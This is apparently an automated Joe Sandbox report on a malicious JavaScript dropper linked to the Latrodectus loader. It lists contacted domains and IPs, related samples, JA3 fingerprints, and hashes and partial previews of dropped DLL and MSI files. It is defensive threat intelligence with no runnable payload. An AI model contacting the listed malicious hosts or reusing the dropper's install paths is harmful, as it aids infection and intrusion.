104.21.46.75	jarinamaers.shop	United States	13335	CLOUDFLARENETUS	true
172.67.197.34	pewwhranet.com	United States	13335	CLOUDFLARENETUS	true
172.67.219.28	grizmotras.com	United States	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
146.19.106.236	unknown	France	7726	FITC-ASUS	false

Private

IP
192.168.2.4
192.168.2.13
192.168.2.23
192.168.2.15
192.168.2.14

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432364
Start date and time:	2024-04-26 23:15:40 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Document_a51_19i793302-14b09981a5569-3684u8.js
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winJS@93/27@13/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 35 Number of non-executed functions: 335
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.18.20.226, 104.18.21.226, 72.21.81.240, 192.178.50.67, 173.194.215.84, 192.178.50.46, 34.104.35.123, 192.229.211.108, 142.250.217.195, 142.251.35.238
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, cdn.globalsigncdn.com.cdn.cloudflare.net, self.events.data.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, secure.globalsign.com, fe3cr.delivery.mp.microsoft.com, global.prd.cdn.globalsign.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, clients.l.google.com
Execution Graph export aborted for target rundll32.exe, PID 7784 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Document_a51_19i793302-14b09981a5569-3684u8.js

Simulations

Behavior and APIs

Time	Type	Description
23:16:28	API Interceptor	2x Sleep call for process: wscript.exe modified
23:16:30	API Interceptor	1x Sleep call for process: msiexec.exe modified
23:17:15	API Interceptor	35603424x Sleep call for process: rundll32.exe modified
23:19:03	API Interceptor	2x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
	2k632W2O.exe	Get hash	malicious	Clipboard Hijacker	Browse
	https://sites.google.com/authorizewebcenter.com/565hu4?usp=sharing	Get hash	malicious	HTMLPhisher	Browse
	http://carajasnutricaoanimal.com	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.eml	Get hash	malicious	HTMLPhisher	Browse
	Lab5-1.docx	Get hash	malicious	Unknown	Browse
	Purchase Order is approved26042024.cmd	Get hash	malicious	Remcos, DBatLoader	Browse
	https://messageis.ru/pre/profile/message	Get hash	malicious	HTMLPhisher	Browse
	https://herofargwsmnncmwsrcnmwsncmwscnm.popsy.site/	Get hash	malicious	HTMLPhisher	Browse
	MSG.docx	Get hash	malicious	Unknown	Browse
104.21.46.75	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
	ad.msi	Get hash	malicious	Latrodectus	Browse
	ad.msi	Get hash	malicious	Latrodectus	Browse
172.67.219.28	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
	neo.msi	Get hash	malicious	Latrodectus	Browse
	ad.msi	Get hash	malicious	Latrodectus	Browse
	360total.dll.dll	Get hash	malicious	Latrodectus	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jarinamaers.shop	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	104.21.46.75
	neo.msi	Get hash	malicious	Latrodectus	Browse	172.67.136.103
	neo.msi	Get hash	malicious	Latrodectus	Browse	104.21.46.75
	ad.msi	Get hash	malicious	Latrodectus	Browse	104.21.46.75
	Document_a19_79b555791-28h97348k5477-3219g9.js	Get hash	malicious	Latrodectus	Browse	172.67.136.103
	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.136.103
	ad.msi	Get hash	malicious	Latrodectus	Browse	104.21.46.75
pewwhranet.com	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	104.21.84.207
	neo.msi	Get hash	malicious	Latrodectus	Browse	104.21.84.207
	Util.dll	Get hash	malicious	Bazar Loader, Latrodectus	Browse	172.67.197.34
grizmotras.com	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	neo.msi	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	ad.msi	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	Document_a19_79b555791-28h97348k5477-3219g9.js	Get hash	malicious	Latrodectus	Browse	104.21.59.82
	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	Util.dll	Get hash	malicious	Bazar Loader, Latrodectus	Browse	104.21.59.82

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FITC-ASUS	AdvancedReclaiMeFreeRAIDRecoveryFreeSetup.msi	Get hash	malicious	DanaBot	Browse	146.19.254.194
	n0CEgmtnuf.elf	Get hash	malicious	Mirai	Browse	155.161.179.45
	wFtZih4nN9.elf	Get hash	malicious	Mirai	Browse	199.82.245.121
	16rBksY5gH.elf	Get hash	malicious	Mirai	Browse	155.161.155.91
	sYlwfFFwFb.elf	Get hash	malicious	Mirai	Browse	155.161.132.179
	74pdei4s1x.elf	Get hash	malicious	Mirai	Browse	170.86.43.35
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	155.161.179.36
	Del3SHndZJ.elf	Get hash	malicious	Mirai	Browse	146.19.118.245
	7m7X62tiZr.elf	Get hash	malicious	Mirai	Browse	146.19.118.211
	https://withgrayce.com/beyond-back-up-care-what-family-care-looks-like-for-todays-employees-part-1/	Get hash	malicious	Unknown	Browse	146.19.254.43
CLOUDFLARENETUS	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	104.21.84.207
	http://carajasnutricaoanimal.com	Get hash	malicious	Unknown	Browse	172.67.187.174
	phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://messageis.ru/pre/profile/message	Get hash	malicious	HTMLPhisher	Browse	104.21.88.109
	MSG.docx	Get hash	malicious	Unknown	Browse	104.17.2.184
	http://trailersalesandparts.ca	Get hash	malicious	Unknown	Browse	104.17.25.14
	MSG.docx	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-X	Get hash	malicious	HTMLPhisher	Browse	104.21.89.211
	https://doc-42.jimdosite.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.3.184
	https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/	Get hash	malicious	Unknown	Browse	104.18.12.112
CLOUDFLARENETUS	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	104.21.84.207
	http://carajasnutricaoanimal.com	Get hash	malicious	Unknown	Browse	172.67.187.174
	phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://messageis.ru/pre/profile/message	Get hash	malicious	HTMLPhisher	Browse	104.21.88.109
	MSG.docx	Get hash	malicious	Unknown	Browse	104.17.2.184
	http://trailersalesandparts.ca	Get hash	malicious	Unknown	Browse	104.17.25.14
	MSG.docx	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-X	Get hash	malicious	HTMLPhisher	Browse	104.21.89.211
	https://doc-42.jimdosite.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.3.184
	https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/	Get hash	malicious	Unknown	Browse	104.18.12.112
CLOUDFLARENETUS	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	104.21.84.207
	http://carajasnutricaoanimal.com	Get hash	malicious	Unknown	Browse	172.67.187.174
	phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://messageis.ru/pre/profile/message	Get hash	malicious	HTMLPhisher	Browse	104.21.88.109
	MSG.docx	Get hash	malicious	Unknown	Browse	104.17.2.184
	http://trailersalesandparts.ca	Get hash	malicious	Unknown	Browse	104.17.25.14
	MSG.docx	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-X	Get hash	malicious	HTMLPhisher	Browse	104.21.89.211
	https://doc-42.jimdosite.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.3.184
	https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/	Get hash	malicious	Unknown	Browse	104.18.12.112

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	23.46.214.6 20.114.59.183
	2k632W2O.exe	Get hash	malicious	Clipboard Hijacker	Browse	23.46.214.6 20.114.59.183
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	23.46.214.6 20.114.59.183
	https://sites.google.com/authorizewebcenter.com/565hu4?usp=sharing	Get hash	malicious	HTMLPhisher	Browse	23.46.214.6 20.114.59.183
	http://carajasnutricaoanimal.com	Get hash	malicious	Unknown	Browse	23.46.214.6 20.114.59.183
	Lab5-1.docx	Get hash	malicious	Unknown	Browse	23.46.214.6 20.114.59.183
	Purchase Order is approved26042024.cmd	Get hash	malicious	Remcos, DBatLoader	Browse	23.46.214.6 20.114.59.183
	https://messageis.ru/pre/profile/message	Get hash	malicious	HTMLPhisher	Browse	23.46.214.6 20.114.59.183
	MSG.docx	Get hash	malicious	Unknown	Browse	23.46.214.6 20.114.59.183
	http://trailersalesandparts.ca	Get hash	malicious	Unknown	Browse	23.46.214.6 20.114.59.183
a0e9f5d64349fb13191bc781f81f42e1	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	20.189.173.10
	Purchase Order is approved26042024.cmd	Get hash	malicious	Remcos, DBatLoader	Browse	20.189.173.10
	https://control.mailblaze.com/index.php/survey/wq790f4mf09e0	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	20.189.173.10
	neo.msi	Get hash	malicious	Latrodectus	Browse	20.189.173.10
	z55NF-Faturada-23042024.msi	Get hash	malicious	MicroClip	Browse	20.189.173.10
	ePI4igo4y1.exe	Get hash	malicious	AsyncRAT	Browse	20.189.173.10
	file.exe	Get hash	malicious	RisePro Stealer	Browse	20.189.173.10
	file.exe	Get hash	malicious	RisePro Stealer	Browse	20.189.173.10
	http://cleverchoice.com.au	Get hash	malicious	Unknown	Browse	20.189.173.10
	https://therufus.org/download.php	Get hash	malicious	Unknown	Browse	20.189.173.10
37f463bf4616ecd445d4a1937da06e19	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	file.exe	Get hash	malicious	Vidar	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	neo.msi	Get hash	malicious	Latrodectus	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	file.exe	Get hash	malicious	Vidar	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	BundleSweetIMSetup.exe	Get hash	malicious	Unknown	Browse	104.21.46.75 172.67.197.34 172.67.219.28
	DHL_ES567436735845755676678877988975877.vbs	Get hash	malicious	FormBook, GuLoader, Remcos	Browse	104.21.46.75 172.67.197.34 172.67.219.28

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Installer\MSI181.tmp	neo.msi	Get hash	malicious	Latrodectus	Browse
	neo.msi	Get hash	malicious	Latrodectus	Browse
	ad.msi	Get hash	malicious	Latrodectus	Browse
	Document_a19_79b555791-28h97348k5477-3219g9.js	Get hash	malicious	Latrodectus	Browse
	ad.msi	Get hash	malicious	Latrodectus	Browse
	sharepoint.msi	Get hash	malicious	Unknown	Browse
	slack.msi	Get hash	malicious	Bazar Loader	Browse
	out_bdrts.js	Get hash	malicious	Bazar Loader	Browse
	font.msi	Get hash	malicious	Bazar Loader	Browse
	Letter_q50_63b944998-11n0283407179-6803z4.js	Get hash	malicious	Unknown	Browse
:wtfbbq (copy)	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
	neo.msi	Get hash	malicious	Latrodectus	Browse
	neo.msi	Get hash	malicious	Latrodectus	Browse
C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
	neo.msi	Get hash	malicious	Latrodectus	Browse
	neo.msi	Get hash	malicious	Latrodectus	Browse
C:\Users\user\AppData\Local\sharepoint\360total.dll	360total.dll.dll	Get hash	malicious	Latrodectus	Browse
	neo.msi	Get hash	malicious	Latrodectus	Browse
	neo.msi	Get hash	malicious	Latrodectus	Browse

Created / dropped Files

:wtfbbq (copy)

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.271226161679794
Encrypted:	false
SSDEEP:	12288:WfPSAAUHV4fZUv/TrguVTax7hNRu18VAyJFoxMk/wYeDKDMyPDi:MPSAAUHV4fZUvfgmaxpu1FyJ6xMYHMke
MD5:	BD3A3714EE9A071EBEB59AC91D9EBB5A
SHA1:	55110A221F20A4CEEC34C58D0179FA31F8C102E9
SHA-256:	4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
SHA-512:	7244220F29057339C99A22C20268187BA6F6681251F4CE4F305AD22DC030F6078B4F298EF10AD392DC5D036C41C7B8C28C2BD997EA39EF7AB023CB9B5C946DC8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Joe Sandbox View:	Filename: 360total.dll.dll, Detection: malicious, Browse Filename: neo.msi, Detection: malicious, Browse Filename: neo.msi, Detection: malicious, Browse
Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..Bwsgi2........P.........................@..........!1)FX?@T#s9Cey$lE<HI0x&%czAYeH9a))*C9%fd8%Z<@zCvcK....................................

C:\Config.Msi\4e00e0.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1204
Entropy (8bit):	5.677513328665143
Encrypted:	false
SSDEEP:	24:D9gyI6AE6jIMaI3I4iItRpUSxFPRmfiSfiDDhiSrokfkDLK:D9B+jhaxt+bhPRaieiDD8Srb
MD5:	171219F2A340BFEDFCF36CBF7B3D4EEB
SHA1:	78F8466FAEB28E188D7FDF61DE195A3E951C9865
SHA-256:	04CFE6B66A046C5EEB5446499D8A0C0678FB388E29A62270F0E402FEEF661B38
SHA-512:	CFEB594D7C621587C2588661D98D778709A5BBA9F8899D5F0BFDAE4FE4EED3B511D0094C3800DCF3F4DD41815D6DF0E633D0261159763E75EFC6EA175453C44F
Malicious:	false
Preview:	...@IXOS.@.....@!..X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..neo.msi.@.....@.....@.....@........&.{6C81CEE0-3161-4D91-A688-254B67D7D838}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@........CreateFolders..Creating folders..Folder: [1]#.6.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..(.C:\Users\user\AppData\Local\sharepoint\....4.C:\Users\user\AppData\Local\sharepoint\360total.dll....WriteRegistryValues..Writing system registry va

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	69993
Entropy (8bit):	7.99584879649948
Encrypted:	true
SSDEEP:	1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
MD5:	29F65BA8E88C063813CC50A4EA544E93
SHA1:	05A7040D5C127E68C25D81CC51271FFB8BEF3568
SHA-256:	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
SHA-512:	E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
Malicious:	false
Preview:	MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[I.hOB."..rK.RQ..}f..f...}....9.\|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..\|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..\|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1398
Entropy (8bit):	7.676048742462893
Encrypted:	false
SSDEEP:	24:ujsZPSIPSUcnA3/46giyfV4Hxk7P3Gus6acCQ4CXmW5mOgs:ujul2nQ4XfVkk7P3g6dB42mVs
MD5:	E94FB54871208C00DF70F708AC47085B
SHA1:	4EFC31460C619ECAE59C1BCE2C008036D94C84B8
SHA-256:	7B9D553E1C92CB6E8803E137F4F287D4363757F5D44B37D52F9FCA22FB97DF86
SHA-512:	2E15B76E16264ABB9F5EF417752A1CBB75F29C11F96AC7D73793172BD0864DB65F2D2B7BE0F16BBBE686068F0C368815525F1E39DB5A0D6CA3AB18BE6923B898
Malicious:	false
Preview:	0..r0..Z.......vS..uFH....JH:N.0....H........0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450...200318000000Z..450318000000Z0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450.."0....H.............0.........-.0.z.=.r.:K..a....g.7..~.....C..E..cW]....%..h.K..K.J...j..a'..D...?".O.....(..].Y.......,.3$.P:A..{.M.X8.........,..C...t...{.3..Yk....Z.{..U......L...u.o.a.tD....t..h.l&>.......0....\|U..p\$x %.gg...N4.kp..8...........;.gC....t./.....7=gl.E\.a.A.....w.FGs.....+....X.W..Z..%....r=....;D.&.........E.......Bng~B.qb...`.d....!N+.mh...tsg1z...yn\|..~FoM..+."D...7..aW...$..1s..5WG~.:E.-.Q.....7.e...k.w....?.0.o1..@........PvtY..m.2...~...u..J.,....+B..j6..L.............:.c...$d.......B0@0...U...........0...U.......0....0...U.........F...x9...C.VP..;0...*.H.............^+.t.4D_vH(@....n..%.{...=..v...0 ..`.....x.+.2..$.RR......9n....CA}..[.]...&..tr&....=;jR.<../.{.3.E.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.1377209395235166
Encrypted:	false
SSDEEP:	6:kK06lllDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:J/lMkPlE99SNxAhUeVLVt
MD5:	4122938CED872243122181E48DB620C1
SHA1:	2EA60BD9D7DA80F21776E38EE0A93B44733FF28D
SHA-256:	512587AB13A836420C5F0AC7FDFB84F86C374A55F38E23D84AC0DC93600EA31C
SHA-512:	4D781B0BE7DA92C021EDA514628989B9C220DE8683801AF126956191654150A28DE692868D3249F6C747F51305E4D3AB6D69E9B70F9E978AC41C64FBDA472114
Malicious:	false
Preview:	p...... ................(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	264
Entropy (8bit):	3.0766064977623944
Encrypted:	false
SSDEEP:	6:kKy3cK2GhipWhliK8al0GQcmqe3KQjMIo1l2L/:672GIWzyZ3qe3KQjxoK
MD5:	00F82AB428163D7CCFD0EB4138B34BD6
SHA1:	AA32ADB543DFD43AE3DB6C74C2D91029D43D782B
SHA-256:	F9D0DFD543037F8693CDA274EA4B303D3379E93B25BAE36A32F5A87235EB6D0C
SHA-512:	381F865452C942EAA2C0606EB5D129D17FBFE45D7E2663BF32E48875C52C9DA236139F581AE999BA17E2DFE7FAA9CDF50E1F07673094955236F24705193DB728
Malicious:	false
Preview:	p...... ....v...........(....................................................... .................(.............v...h.t.t.p.:././.s.e.c.u.r.e...g.l.o.b.a.l.s.i.g.n...c.o.m./.c.a.c.e.r.t./.c.o.d.e.s.i.g.n.i.n.g.r.o.o.t.r.4.5...c.r.t...".6.2.f.a.3.3.e.5.-.5.7.6."...

C:\Users\user\AppData\Local\sharepoint\360total.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.271226161679794
Encrypted:	false
SSDEEP:	12288:WfPSAAUHV4fZUv/TrguVTax7hNRu18VAyJFoxMk/wYeDKDMyPDi:MPSAAUHV4fZUvfgmaxpu1FyJ6xMYHMke
MD5:	BD3A3714EE9A071EBEB59AC91D9EBB5A
SHA1:	55110A221F20A4CEEC34C58D0179FA31F8C102E9
SHA-256:	4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
SHA-512:	7244220F29057339C99A22C20268187BA6F6681251F4CE4F305AD22DC030F6078B4F298EF10AD392DC5D036C41C7B8C28C2BD997EA39EF7AB023CB9B5C946DC8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Joe Sandbox View:	Filename: 360total.dll.dll, Detection: malicious, Browse Filename: neo.msi, Detection: malicious, Browse Filename: neo.msi, Detection: malicious, Browse
Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..Bwsgi2........P.........................@..........!1)FX?@T#s9Cey$lE<HI0x&%czAYeH9a))*C9%fd8%Z<@zCvcK....................................

C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.271226161679794
Encrypted:	false
SSDEEP:	12288:WfPSAAUHV4fZUv/TrguVTax7hNRu18VAyJFoxMk/wYeDKDMyPDi:MPSAAUHV4fZUvfgmaxpu1FyJ6xMYHMke
MD5:	BD3A3714EE9A071EBEB59AC91D9EBB5A
SHA1:	55110A221F20A4CEEC34C58D0179FA31F8C102E9
SHA-256:	4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
SHA-512:	7244220F29057339C99A22C20268187BA6F6681251F4CE4F305AD22DC030F6078B4F298EF10AD392DC5D036C41C7B8C28C2BD997EA39EF7AB023CB9B5C946DC8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Joe Sandbox View:	Filename: 360total.dll.dll, Detection: malicious, Browse Filename: neo.msi, Detection: malicious, Browse Filename: neo.msi, Detection: malicious, Browse
